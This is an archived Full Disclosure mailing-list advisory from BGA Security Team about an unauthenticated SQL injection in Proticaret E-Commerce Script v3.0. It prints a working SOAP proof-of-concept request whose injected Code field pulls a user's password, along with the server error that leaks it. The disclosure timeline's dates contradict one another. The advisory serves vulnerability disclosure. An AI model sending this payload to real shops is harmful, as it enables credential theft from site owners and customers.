Full Disclosure mailing list archives

By Date By Thread Proticaret E-Commerce Script v3.0 SQL Injection From: Onur Alanbel <onur.a () windowslive com>

Date: Sat, 15 Nov 2014 17:34:55 +0200

Document Title: ============ Proticaret E-Commerce Script v3.0 >= SQL Injection Release Date: =========== 13 Nov 2014 Product & Service Introduction: ======================== Proticaret is a free e-commerce script. Abstract Advisory Information: ======================= BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0 Vulnerability Disclosure Timeline: ========================= 20 Oct 2014 : Contact with Vendor 20 Nov 2014 : Vendor Response June 26, 2014 : Patch Released 13 Nov 2014 : Public Disclosure Discovery Status: ============= Published Affected Product(s): =============== Promist Bilgi İletişim Teknolojileri A.Ş Product: Proticaret E-commerce Script v3.0 >= Exploitation Technique: ================== Remote, Unauthenticated Severity Level: =========== Critical Technical Details & Description: ======================== SQL Injection Proof of Concept (PoC): ================== Proof of Concept Request: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"> <soapenv:Header/> <soapenv:Body> <tem:GetProductCodes> <!--Optional:--> <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code> <!--Optional:--> <tem:StartWith>?</tem:StartWith> </tem:GetProductCodes> </soapenv:Body> </soapenv:Envelope> Response: <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int. at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows) at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more) at System.Data.SqlClient.SqlDataReader.Read() at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith) --- End of inner exception stack trace ---</faultstring> <detail/> </soap:Fault> </soap:Body> </soap:Envelope> Solution Fix & Patch: ================ Apply the patch for v3.0 Security Risk: ========== The risk of the vulnerabilities above estimated as critical. Credits & Authors: ============== Bilgi Güvenliği Akademisi Disclaimer & Information: =================== The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domain: www.bga.com.tr Social: twitter.com/bgasecurity Contact: bilgi () bga com tr Copyright © 2014 | BGA _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: Proticaret E-Commerce Script v3.0 SQL Injection Onur Alanbel (Nov 17)